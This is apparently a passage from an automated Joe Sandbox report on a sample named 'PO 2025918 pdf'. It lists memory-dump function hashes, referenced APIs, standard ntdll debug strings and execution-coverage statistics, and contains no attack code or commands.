                                                                                • Instruction ID: 306c7d643aa60d22ef4fa14ad13c60527e29f766f29794986f0eef0d13753ae0
                                                                                • Opcode Fuzzy Hash: bb32b891ea1f262839e6295b3655eb4e6397ea6681efbd20c542e95e1e27e1a3
                                                                                • Instruction Fuzzy Hash: 7F018936105149EBCF129E88D840EDE7F66FB4C664F158101FE1966224C336D970EB81
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 87b9d75aac6e3790da3685da257c9704585e26cee00e06a1e13277dcf8dbe535
                                                                                • Instruction ID: e86c6b652d80f23d5fdf34478e86c0bac92ebd1d952953b55ab3fb6daacd3119
                                                                                • Opcode Fuzzy Hash: 87b9d75aac6e3790da3685da257c9704585e26cee00e06a1e13277dcf8dbe535
                                                                                • Instruction Fuzzy Hash: 92F024712042415BF710AA2DDC91BA3329AE7E0756F25816AEB458B3C1EE70DC0183B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5f883ee5cd4918423aaf83ff07e973f3c6cd8e6ab577fb694a2242c19127c264
                                                                                • Instruction ID: 1125a33f9c88961ba9e2c91ec9de6dd0133fd4e12a64fff8f02c648b2d92addc
                                                                                • Opcode Fuzzy Hash: 5f883ee5cd4918423aaf83ff07e973f3c6cd8e6ab577fb694a2242c19127c264
                                                                                • Instruction Fuzzy Hash: DC01A970240781DBE3239B6CCD48F35B7D4FB54F04F944198BA01DB7EAD768D4418618
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                • Instruction ID: 0e1b45f89c6a1cea530293e2585552b181d5afbf110381cf5a7f26933e0fb03e
                                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                • Instruction Fuzzy Hash: 86F02E32341D1347EB3EAA2D8810B3EF656AFD0E40B05052C9683EB641DF20DC00C780
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                • Instruction ID: 6971bf744228735a3b4438727977fad05bd0ee4d7aae7f36926e45cd0d916bb1
                                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                • Instruction Fuzzy Hash: F1F08933B916119FD3329A4DDC80F16F769EFD5A60F591079AE059B268CB60EC41CBD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7f6e7dfac38c782a48c9ce9f5708e6cf259883f2b409eea706f05201754556fc
                                                                                • Instruction ID: df320c10b718d12b767c9aae3b6b58505aba26307f46fb51338e105970476ae6
                                                                                • Opcode Fuzzy Hash: 7f6e7dfac38c782a48c9ce9f5708e6cf259883f2b409eea706f05201754556fc
                                                                                • Instruction Fuzzy Hash: 66F0AF71A553049FC310EF68C945A1AB7E4FF98710F40865EBC98DB394EA34E900CB9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                • Instruction ID: 39cd89f46e6de76555553d002653843c8b9b83541dc648c588248612c12b45a4
                                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                • Instruction Fuzzy Hash: 3EF09072611204EEE714DB25CC01F66B6EAEF98744F25C068A545D72A4EAB0DD01C654
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9bad7055f60a07fc7892ffc8c2bed3dffd273902d68e27d831408ad5e72b5b0c
                                                                                • Instruction ID: e1cc7a741139042789f0ec848d63fab025ea2d1a319af80edc076d36e2092d66
                                                                                • Opcode Fuzzy Hash: 9bad7055f60a07fc7892ffc8c2bed3dffd273902d68e27d831408ad5e72b5b0c
                                                                                • Instruction Fuzzy Hash: 6BF0B4725483446BD7217A1CAC44B5AFB6DFBD8734F994429F989272258A306CC0C780
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5abb2d7d78b905259b99d640d1982b728a07b11082e5c09aef2a329b21b3f824
                                                                                • Instruction ID: fe7167a5ddea4da045f64a8d9030bf139d76ffb9e17655d0bea4f03ebfd3a865
                                                                                • Opcode Fuzzy Hash: 5abb2d7d78b905259b99d640d1982b728a07b11082e5c09aef2a329b21b3f824
                                                                                • Instruction Fuzzy Hash: 8AF06270A01249DFCB04EFA9C515A5EB7B5FF18300F10806AB955EB395DA38EE01CB94
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction ID: df967131ed8df3e1bd40a224c11ac22fc82bcf0fca52918fa936e8b3caedd114
                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                • Instruction Fuzzy Hash: 8BD01236100249EFCB11DF41C890D9B7B3BFBD8710F108019FD19076108A31ED62DB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                • Instruction ID: 18034b5f5b9d72f35d236eec745c8ea3b89080c82d352b34b6452e916e0ccc12
                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                • Instruction Fuzzy Hash: 61C002756019418BCF15DA59D694A4577E4B754740F151890E8058B721E624E811CA10
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
                                                                                • Instruction ID: 40bcdfbd4ea1c420813955d6001ae75c38ceeaf954177ef336399aaa7c61bab8
                                                                                • Opcode Fuzzy Hash: 9e201d4ceb194298e69fe52079980d6874a95bcbcd5165a112813397d31d0078
                                                                                • Instruction Fuzzy Hash: 5C900231606800129140755C4C885474049A7E0301B55C111E4424A54DCA148A565361
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
                                                                                • Instruction ID: 82ef257d0559fb3a29e9a6cd60a2fe59b7c60188afab8968266e96ae2a3277ec
                                                                                • Opcode Fuzzy Hash: 7bd6c29091166d82cb929dce3ae3ee7901cff0b4b06d95e9d85b87bcfafbac0b
                                                                                • Instruction Fuzzy Hash: D4900261602500424140755C4C084076049A7E1301395C215A4554A60DC61889559369
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
                                                                                • Instruction ID: 67a364fe8e14ed5632886f95e86cd4f5d87f07dfc5b7f13aaae13740efc2225f
                                                                                • Opcode Fuzzy Hash: 80b18b0b45cbc55f33d1a20ef647c86597763d1fa1f713f5d3d928ccd64936d2
                                                                                • Instruction Fuzzy Hash: B190023120644842D140755C4808A47005997D0305F55C111A4064B94ED6258E55B761
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
                                                                                • Instruction ID: c3a34b5f254555c36356b5217c86ff3a484bd86302627ff31b4562c86115bac1
                                                                                • Opcode Fuzzy Hash: 03b96bd9e863b764da47ca1fbe5c551c0afb9cddf6c05b7b7ad146922667eb14
                                                                                • Instruction Fuzzy Hash: B090023120240802D180755C480864B004997D1301F95C115A4025B54ECA158B5977A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
                                                                                • Instruction ID: 232d4d706690b32cc14004843a87c5bee3c5946ef354eaa3bde78fae63c9391a
                                                                                • Opcode Fuzzy Hash: 3bc0e7f99ed547afdb9ee535f14e05024088ccca2043765598ec2e678ec6323b
                                                                                • Instruction Fuzzy Hash: 4390023160640802D150755C4818747004997D0301F55C111A4024B54EC7558B5577A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
                                                                                • Instruction ID: 040f88c164f44f4adfd2eb92ce1a59921d1d4e6edc326dfb892bbf0a81c6ffa9
                                                                                • Opcode Fuzzy Hash: 7187728e15e17815217ff1df34aeb507cdf1407003297e2e73d3058eb829744e
                                                                                • Instruction Fuzzy Hash: F790023120240802D104755C4C08687004997D0301F55C111AA024B55FD66589917231
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
                                                                                • Instruction ID: f6fe2125959c0eff1d856123e2189a418f0e19c6616de5229c81eea04104cfbd
                                                                                • Opcode Fuzzy Hash: 3c76e2a17af96bb59a031fa4948262964c8d34d92207cac6840a6efb0bb9a95d
                                                                                • Instruction Fuzzy Hash: E3900225222400020145B95C0A0850B0489A7D6351395C115F5416A90DC62189655321
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
                                                                                • Instruction ID: fbeb6e38e0f15ba1485f91c0f5dd7b6aab7dbfd053700c4e38834fbb000bb550
                                                                                • Opcode Fuzzy Hash: 56312fac2d2b2380c3cb68f0172bc1dd3a190d04830bc84ff3f7a2ecfef50827
                                                                                • Instruction Fuzzy Hash: 58900225212400030105B95C0B08507008A97D5351355C121F5015A50DD62189615221
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
                                                                                • Instruction ID: 701465d613ce9c61df5ae903ff70ee9e306711b72378145b538d3bc9442f934d
                                                                                • Opcode Fuzzy Hash: 8cf2e0f3088c46ffa7ca1e00f10da82aa7cda15a0ecd4e2ee0becc191265d21d
                                                                                • Instruction Fuzzy Hash: B69002A1202540924500B65C8808B0B454997E0201B55C116E5054A60DC52589519235
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
                                                                                • Instruction ID: 486a48874a061be682f80485b46ce9e1ea673ed063d4ed8d84277817219d411a
                                                                                • Opcode Fuzzy Hash: 1f380e631a054fce5f31e0dba60fe83de2555647c23ba7bc430387177d429139
                                                                                • Instruction Fuzzy Hash: C790022130240003D140755C581C6074049E7E1301F55D111E4414A54DD91589565322
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
                                                                                • Instruction ID: d6db4e49971f0015f753f2fa5e2880271e61bb6bce6948ddd62a7fe9c952ab98
                                                                                • Opcode Fuzzy Hash: fb85231a4ea2a2ee70949be8eed487bff8c8f1be5365a3b95f1fcdc10b3b456e
                                                                                • Instruction Fuzzy Hash: 9190022120644442D100795C580CA07004997D0205F55D111A5064A95EC6358951A231
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
                                                                                • Instruction ID: ce7f9a152cea4fc617bb2d5185193958331a3c5bc099e764255080d609a79892
                                                                                • Opcode Fuzzy Hash: 35a5303cb6c4ced375794af06624ec8f99c8f90e57fdbca4daf47f1d13968305
                                                                                • Instruction Fuzzy Hash: 2590022921340002D180755C580C60B004997D1202F95D515A4015A58DC91589695321
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
                                                                                • Instruction ID: 418ae42a3089299a258ac27baf409d198cb57903cb854c0114405629dfbc5d13
                                                                                • Opcode Fuzzy Hash: 80f02b445fb442c1b7bd36d84eeac7f9fcd182bf0f080dca008a392465f11b7d
                                                                                • Instruction Fuzzy Hash: DB900221243441525545B55C4808507404AA7E0241795C112A5414E50DC5269956D721
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
                                                                                • Instruction ID: c2d4875835202249071c6a66e61a2878d8394771e725bca2dd2aa50459ae8cc3
                                                                                • Opcode Fuzzy Hash: 6d07cf56fdedd0b8de7b697c59c84f26bb34a8c17542031c817c8f5d0586e35e
                                                                                • Instruction Fuzzy Hash: B690023124240402D141755C4808607004DA7D0241F95C112A4424A54FC6558B56AB61
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                                                • Instruction ID: 15aab3dfc6eb210d79a611325900e5cd1e88454b55911327b49d8e5d947796ae
                                                                                • Opcode Fuzzy Hash: 98d23e713f534060552b423b5143de9e97882afe6323c4b2698f95a80f72be3b
                                                                                • Instruction Fuzzy Hash: 5390023120240842D100755C4808B47004997E0301F55C116A4124B54EC615C9517621
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                                                • Instruction ID: 90acc863a166885aa9b7aab1e1fd5793e7d51a71814bb781c1cad1934677c31c
                                                                                • Opcode Fuzzy Hash: ac817041f64bb976dce5b8531afb7a4e8226deadb2cedf5eb9e7ac562ad14299
                                                                                • Instruction Fuzzy Hash: 9D51D4A6E04216AECB21DB9DCCA097EFBF8BB48240B10826DE565D7641D374DE5487E0
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                Strings
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01704655
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01704787
                                                                                • ExecuteOptions, xrefs: 017046A0
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01704725
                                                                                • Execute=1, xrefs: 01704713
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017046FC
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01704742
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 0-484625025
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-$0$0
                                                                                • API String ID: 1302938615-699404926
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 0170031E
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017002BD
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017002E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                • API String ID: 0-2474120054
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 01707BAC
                                                                                • RTL: Resource at %p, xrefs: 01707B8E
                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01707B7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 0-871070163
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0170728C
                                                                                Strings
                                                                                • RTL: Re-Waiting, xrefs: 017072C1
                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01707294
                                                                                • RTL: Resource at %p, xrefs: 017072A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-605551621
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: %%%u$]:%u
                                                                                • API String ID: 48624451-3050659472
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_1660000_PO 2025918 pdf.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $$@
                                                                                • API String ID: 0-1194432280

                                                                                Execution Graph

                                                                                Execution Coverage:2.5%
                                                                                Dynamic/Decrypted Code Coverage:3.7%
                                                                                Signature Coverage:1.4%
                                                                                Total number of Nodes:508
                                                                                Total number of Limit Nodes:77
